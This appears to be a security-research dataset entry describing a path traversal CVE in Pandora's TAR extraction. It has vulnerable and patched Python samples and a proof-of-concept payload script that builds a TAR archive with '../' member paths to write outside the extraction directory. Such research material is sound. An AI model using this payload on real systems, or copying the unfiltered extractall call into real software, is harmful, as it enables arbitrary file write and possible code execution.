VAITP Dataset

← Back to the dataset

CVE-2026-74764

Path traversal in Pandora's TAR extraction allows arbitrary file write.

  • CVSS 10.0
  • 22
  • Input Validation and Sanitization
  • Remote

Pandora contains a path traversal vulnerability in its TAR archive extraction functionality. When processing a submitted TAR archive, the extractor passed archive member names directly to Python's tarfile.TarFile.extract() without applying an extraction filter. An attacker able to submit a specially crafted TAR archive containing malicious member paths, such as paths using ../ sequences or absolute paths, could cause extracted files to be written outside the intended extraction directory. This may allow the attacker to overwrite files accessible to the Pandora worker process and could potentially result in application compromise, arbitrary code execution, or denial of service depending on the files targeted and the privileges of the Pandora process. The vulnerability is corrected by using Python's filter='data' extraction filter, which rejects or sanitizes dangerous TAR members, including paths that escape the destination directory and unsafe link targets. The weakness corresponds to MITRE's general path traversal category, which includes archive extraction cases where attacker-controlled filenames cause files to be written outside the intended directory.

CWE
22
CVSS base score
10.0
Published
2026-08-15
OWASP
A08 Software and Data Integrity Failures
Orthogonal defect classification
Checking
Code defect classification
Missing Check
Category
Input Validation and Sanitization
Subcategory
Path Traversal
Accessibility scope
Remote
Impact
Arbitrary Code Execution
Affected component
Python
Fixed by upgrading
Yes

Solution

Upgrade to a patched version of Pandora. The fix is to use the `filter='data'` parameter in Python's `tarfile.extractall()` method to prevent path traversal during archive extraction.

Vulnerable code sample

import os
import tarfile
import tempfile

class PandoraPackage:
    def __init__(self, tar_data):
        self.tar_data = tar_data

    def install(self, install_base_path):
        """
        Extracts the package TAR archive to a destination directory.
        """
        # Create a temporary directory for extraction
        destination_path = tempfile.mkdtemp(dir=install_base_path)

        try:
            with tarfile.open(fileobj=self.tar_data, mode="r:*") as tar:
                # VULNERABLE: The 'extractall' method is called without a filter, allowing malicious filenames (e.g., '../../evil.py') to be written outside the 'destination_path'.
                tar.extractall(path=destination_path)
            # Proceed with package installation logic...
            return True
        except tarfile.TarError:
            # Handle corrupted or invalid tar files
            return False

Patched code sample

import os
import tarfile
import tempfile

class PandoraPackage:
    def __init__(self, tar_data):
        self.tar_data = tar_data

    def install(self, install_base_path):
        """
        Extracts the package TAR archive to a destination directory.
        """
        # Create a temporary directory for extraction
        destination_path = tempfile.mkdtemp(dir=install_base_path)

        try:
            with tarfile.open(fileobj=self.tar_data, mode="r:*") as tar:
                # FIX: The 'data' filter is used to sanitize member paths, preventing path traversal by stripping '..' and absolute path components.
                tar.extractall(path=destination_path, filter="data")
            # Proceed with package installation logic...
            return True
        except tarfile.TarError:
            # Handle corrupted or invalid tar files
            return False

Payload

import tarfile
import io
import time

# Define the malicious archive name
output_filename = "malicious-archive.tar"

# Define the traversal path and the file to be created/overwritten
# This path attempts to escape the extraction directory and write a file to /tmp/
malicious_path = "../../../../../../../tmp/pwned_by_path_traversal"
file_content = b"This file was placed here by exploiting the path traversal vulnerability."

# Use an in-memory BytesIO object to hold the file content
content_stream = io.BytesIO(file_content)

# Create the malicious TAR archive
with tarfile.open(output_filename, "w") as tar:
    # Create a TarInfo object for the malicious file entry
    tar_info = tarfile.TarInfo(name=malicious_path)
    tar_info.size = len(file_content)
    tar_info.mtime = time.time()
    
    # Add the malicious file (metadata and content) to the archive
    tar.addfile(tarinfo=tar_info, fileobj=content_stream)

Cite this entry

@misc{vaitp:cve202674764,
  title        = {{Path traversal in Pandora's TAR extraction allows arbitrary file write.}},
  author       = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
  year         = {2026},
  note         = {VAITP Python Vulnerability Dataset, entry CVE-2026-74764},
  howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2026-74764/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.

The supreme art of war is to subdue the enemy without fighting.

Sun Tzu – “The Art of War”

:: Shaping the future through research and ingenuity ::